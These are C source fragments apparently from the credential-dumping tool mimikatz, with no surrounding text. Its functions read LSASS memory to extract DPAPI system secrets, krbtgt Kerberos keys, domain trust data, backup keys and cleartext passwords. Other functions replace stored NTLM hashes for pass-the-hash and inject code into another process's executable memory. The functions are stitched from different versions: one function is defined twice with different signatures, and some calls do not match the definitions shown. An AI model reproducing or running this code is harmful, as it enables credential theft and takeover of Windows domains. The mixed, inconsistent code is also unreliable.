NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory}; PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package; PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL; BOOL fSystemCredsInitialized; BYTE origInit, rgbSystemCredMachine[SHA_DIGEST_LENGTH], rgbSystemCredUser[SHA_DIGEST_LENGTH]; if(NT_SUCCESS(status)) { if(pPackage->Module.isPresent) { origInit = pPackage->Module.isInit; if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &pPackage->Module, SysCredReferences, ARRAYSIZE(SysCredReferences), &pBool, &pShaSystem, &pShaUser, NULL)) { pPackage->Module.isInit = origInit; // trick to use same packages as normal module. aLocal.address = &fSystemCredsInitialized; aLsass.address = pBool; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(fSystemCredsInitialized))) { if(fSystemCredsInitialized) { kprintf(L"DPAPI_SYSTEM\n"); aLocal.address = &rgbSystemCredMachine; aLsass.address = pShaSystem; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredMachine))) { aLocal.address = &rgbSystemCredUser; aLsass.address = pShaUser; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredUser))) { kprintf(L"full: "); kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0); kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0); kprintf(L"\nm/u : "); kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0); kprintf(L" / "); kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0); kprintf(L"\n"); } } } else PRINT_ERROR(L"Not initialized!\n"); } } } else PRINT_ERROR(L"DPAPI service not in LSASS memory\n"); } return status; }
BOOL CALLBACK kuhl_m_sekurlsa_enum_range(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg) { KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer}; KULL_M_MEMORY_ADDRESS aLsassMem = {NULL, (PKULL_M_MEMORY_HANDLE) pvArg}; PBYTE pZone; PUNICODE_STRING donnees; if((pMemoryBasicInformation->Protect & PAGE_READWRITE) && !(pMemoryBasicInformation->Protect & PAGE_GUARD) && (pMemoryBasicInformation->Type == MEM_PRIVATE)) { aLsassMem.address = pMemoryBasicInformation->BaseAddress; if(aBuffer.address = LocalAlloc(LPTR, pMemoryBasicInformation->RegionSize)) { if(kull_m_memory_copy(&aBuffer, &aLsassMem, pMemoryBasicInformation->RegionSize)) { for(pZone = (PBYTE) aBuffer.address; pZone < (PBYTE) aBuffer.address + pMemoryBasicInformation->RegionSize; pZone += sizeof(LONG)) // TODO fixe memory boundary { donnees = (PUNICODE_STRING) pZone; if(kull_m_string_suspectUnicodeStringStructure(&donnees[0]) && kull_m_string_suspectUnicodeStringStructure(&donnees[1]) && kull_m_string_suspectUnicodeStringStructure(&donnees[2])) kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) donnees, NULL, KUHL_SEKURLSA_CREDS_DISPLAY_LINE | KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY | KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE); } } LocalFree(aBuffer.address); } } return TRUE; }
NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); LONG l = 0; DUAL_KRBTGT dualKrbtgt = {NULL, NULL}; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &hLocalMemory}; if(NT_SUCCESS(status)) { if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent) { if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aLsass.address, NULL, NULL, &l)) { aLsass.address = (PBYTE) aLsass.address + sizeof(PVOID) * l; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(DUAL_KRBTGT))) { kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_current, L"Current"); kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_previous, L"Previous"); } } } else PRINT_ERROR(L"KDC service not in LSASS memory\n"); } return status; }
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData) { PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL)(pCredentials->Credentials.Buffer); PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED)pOptionalData; KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL }; KULL_M_MEMORY_ADDRESS aLocalMemory = { pPrimaryCreds, &hLocalMemory }; if (RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE)) { (*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length); if(pthDataCred->pthData->NtlmHash) { RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH); pPrimaryCreds->isNtOwfPassword = TRUE; } else { RtlZeroMemory(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH); pPrimaryCreds->isNtOwfPassword = FALSE; } RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH); RtlZeroMemory(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH); pPrimaryCreds->isLmOwfPassword = FALSE; pPrimaryCreds->isShaOwfPassword = FALSE; (*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length); kprintf(L"Data copy @ %p : ", origBufferAddress->address); if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length)) kprintf(L"OK !"); else PRINT_ERROR_AUTO(L"kull_m_memory_copy"); } else kprintf(L"."); return TRUE; }
BOOL kull_m_memory_equal(IN PKULL_M_MEMORY_ADDRESS Address1, IN PKULL_M_MEMORY_ADDRESS Address2, IN SIZE_T Lenght) { BOOL status = FALSE; KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; switch(Address1->hMemory->type) { case KULL_M_MEMORY_TYPE_OWN: switch(Address2->hMemory->type) { case KULL_M_MEMORY_TYPE_OWN: status = RtlEqualMemory(Address1->address, Address2->address, Lenght); break; default: status = kull_m_memory_equal(Address2, Address1, Lenght); break; } break; default: if(aBuffer.address = LocalAlloc(LPTR, Lenght)) { if(kull_m_memory_copy(&aBuffer, Address1, Lenght)) status = kull_m_memory_equal(&aBuffer, Address2, Lenght); LocalFree(aBuffer.address); } break; } return status; }
BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PLONG genericOffset1) { KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory}; KULL_M_MEMORY_SEARCH sMemory = {{{pLib->Informations.DllBase.address, cLsass->hLsassMem}, pLib->Informations.SizeOfImage}, NULL}; PKULL_M_PATCH_GENERIC currentReference; #ifdef _M_X64 LONG offset; #endif if(currentReference = kull_m_patch_getGenericFromBuild(generics, cbGenerics, cLsass->osContext.BuildNumber)) { aLocalMemory.address = currentReference->Search.Pattern; if(kull_m_memory_search(&aLocalMemory, currentReference->Search.Length, &sMemory, FALSE)) { aLsassMemory.address = (PBYTE) sMemory.result + currentReference->Offsets.off0; // optimize one day if(genericOffset1) *genericOffset1 = currentReference->Offsets.off1; #ifdef _M_X64 aLocalMemory.address = &offset; if(pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(LONG))) *genericPtr = ((PBYTE) aLsassMemory.address + sizeof(LONG) + offset); #elif defined _M_IX86 aLocalMemory.address = genericPtr; pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID)); #endif if(genericPtr1) { aLsassMemory.address = (PBYTE) sMemory.result + currentReference->Offsets.off1; #ifdef _M_X64 aLocalMemory.address = &offset; if(pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(LONG))) *genericPtr1 = ((PBYTE) aLsassMemory.address + sizeof(LONG) + offset); #elif defined _M_IX86 aLocalMemory.address = genericPtr1; pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID)); #endif } } } return pLib->isInit; }
void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport) { KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &hBuffer}; GUID guid; DWORD cb; PVOID pGuid, pKeyLen, pKeyBuffer; if(kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, generics, cbGenerics, &pGuid, &pKeyLen, &pKeyBuffer, NULL)) { if(aLsass.address = pGuid) { aData.address = &guid; if(kull_m_memory_copy(&aData, &aLsass, sizeof(GUID))) { kull_m_string_displayGUID(&guid); kprintf(L"\n"); if(aLsass.address = pKeyLen) { aData.address = &cb; if(kull_m_memory_copy(&aData, &aLsass, sizeof(DWORD))) { if(cb && (aLsass.address = pKeyBuffer)) { aData.address = &aLsass.address; if(kull_m_memory_copy(&aData, &aLsass, sizeof(PVOID))) { if(aData.address = LocalAlloc(LPTR, cb)) { if(kull_m_memory_copy(&aData, &aLsass, cb)) { kuhl_m_lsadump_analyzeKey(&guid, (PKIWI_BACKUP_KEY) aData.address, cb, isExport); } LocalFree(aData.address); } } } } } } } } }
BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW) { BOOL status = FALSE; PROCESS_BASIC_INFORMATION processInformations; HANDLE hProcess = (memory->type == KULL_M_MEMORY_TYPE_PROCESS) ? memory->pHandleProcess->hProcess : GetCurrentProcess(); KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aBuffer = {pPeb, &hBuffer}; KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory}; PROCESSINFOCLASS info; ULONG szPeb, szBuffer, szInfos; LPVOID buffer; #ifdef _M_X64 if(isWOW) { info = ProcessWow64Information; szBuffer = sizeof(processInformations.PebBaseAddress); buffer = &processInformations.PebBaseAddress; szPeb = sizeof(PEB_F32); } else { #endif info = ProcessBasicInformation; szBuffer = sizeof(processInformations); buffer = &processInformations; szPeb = sizeof(PEB); #ifdef _M_X64 } #endif switch(memory->type) { #ifndef MIMIKATZ_W2000_SUPPORT case KULL_M_MEMORY_TYPE_OWN: if(!isWOW) { *pPeb = *RtlGetCurrentPeb(); status = TRUE; break; } #endif case KULL_M_MEMORY_TYPE_PROCESS: if(NT_SUCCESS(NtQueryInformationProcess(hProcess, info, buffer, szBuffer, &szInfos)) && (szInfos == szBuffer) && processInformations.PebBaseAddress) { aProcess.address = processInformations.PebBaseAddress; status = kull_m_memory_copy(&aBuffer, &aProcess, szPeb); } break; } return status; }
PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuid(PKULL_M_MEMORY_ADDRESS pTable, ULONG LUIDoffset, PLUID luidToFind) { PVOID resultat = NULL; RTL_AVL_TABLE maTable; KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE))) { pTable->address = maTable.BalancedRoot.RightChild; resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind); } return resultat; }
BOOL kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(PKULL_M_MEMORY_HANDLE hProcess, LPCVOID Buffer, DWORD BufferSize, PMULTIPLE_REMOTE_EXT RemoteExt, PKULL_M_MEMORY_ADDRESS DestAddress) { BOOL success = FALSE; DWORD i, j; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalAddr = {(LPVOID) Buffer, &hLocalMemory}; DestAddress->hMemory = hProcess; DestAddress->address = NULL; if(RemoteExt) { if(kull_m_remotelib_GetProcAddressMultipleModules(hProcess, RemoteExt)) { if(aLocalAddr.address = LocalAlloc(LPTR, BufferSize)) { RtlCopyMemory(aLocalAddr.address, Buffer, BufferSize); for(i = 0; i < BufferSize - sizeof(PVOID); i++) { for(j = 0; j < RemoteExt->count; j++) { if((PVOID) RemoteExt->extensions[j].ToReplace == *(PVOID *) ((PBYTE) aLocalAddr.address + i)) { *(PVOID *) ((PBYTE) aLocalAddr.address + i) = RemoteExt->extensions[j].Pointer; //kprintf(L"Found =) - %.*S - %s!%S -> %p\n", sizeof(PVOID), &RemoteExt->extensions[j].ToReplace, RemoteExt->extensions[j].Module, RemoteExt->extensions[j].Function, *(PVOID *) ((PBYTE) aLocalAddr.address + i)); i += sizeof(PVOID) - 1; } } } } } } if(aLocalAddr.address) { if(kull_m_memory_alloc(DestAddress, BufferSize, PAGE_EXECUTE_READWRITE)) { if(!(success = kull_m_memory_copy(DestAddress, &aLocalAddr, BufferSize))) { PRINT_ERROR_AUTO(L"kull_m_memory_copy"); kull_m_memory_free(DestAddress, 0); } } else PRINT_ERROR_AUTO(L"kull_m_memory_alloc / VirtualAlloc(Ex)"); if(RemoteExt) LocalFree(aLocalAddr.address); } else PRINT_ERROR(L"No buffer ?\n"); return success; }
NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); PVOID buffer; KDC_DOMAIN_INFO domainInfo; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer}; if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7) { if(NT_SUCCESS(status)) { if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent) { if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL, NULL)) { if(kull_m_memory_copy(&data, &aLsass, sizeof(PVOID))) { data.address = buffer; data.hMemory = cLsass.hLsassMem; while(data.address != aLsass.address) { if(kull_m_memory_copy(&aBuffer, &data, sizeof(KDC_DOMAIN_INFO))) { kuhl_m_sekurlsa_trust_domaininfo(&domainInfo); data.address = domainInfo.list.Flink; } else break; } } } } else PRINT_ERROR(L"KDC service not in LSASS memory\n"); } } else PRINT_ERROR(L"Only for >= 2008r2\n"); return status; }
BOOL kull_m_string_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source) { BOOL status = FALSE; BYTE nbAuth; DWORD sizeSid; KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aDestin = {&nbAuth, &hOwn}; KULL_M_MEMORY_ADDRESS aSource = {(PBYTE) *pSid + 1, source}; *pSid = NULL; if(kull_m_memory_copy(&aDestin, &aSource, sizeof(BYTE))) { aSource.address = (PBYTE) aSource.address - 1; sizeSid = 4 * nbAuth + 6 + 1 + 1; if(aDestin.address = LocalAlloc(LPTR, sizeSid)) { *pSid = (PSID) aDestin.address; status = kull_m_memory_copy(&aDestin, &aSource, sizeSid); } } return status; }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { KIWI_LIVESSP_LIST_ENTRY credentials; KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, ARRAYSIZE(LiveReferences), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL, NULL)) { aLsassMemory.address = LiveGlobalLogonSessionList; if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) { if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY))) { if(aLsassMemory.address = credentials.suppCreds) { aLocalMemory.address = &primaryCredential; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL))) kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData, (pData->cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT); } } } } else kprintf(L"KO"); }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData) { KIWI_LIVESSP_LIST_ENTRY credentials; KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem}; if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, sizeof(LiveReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL)) { aLsassMemory.address = LiveGlobalLogonSessionList; if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId)) { if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY))) { if(aLsassMemory.address = credentials.suppCreds) { aLocalMemory.address = &primaryCredential; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL))) kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, (cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT, externalCallback, externalCallbackData); } } } } else kprintf(L"KO"); }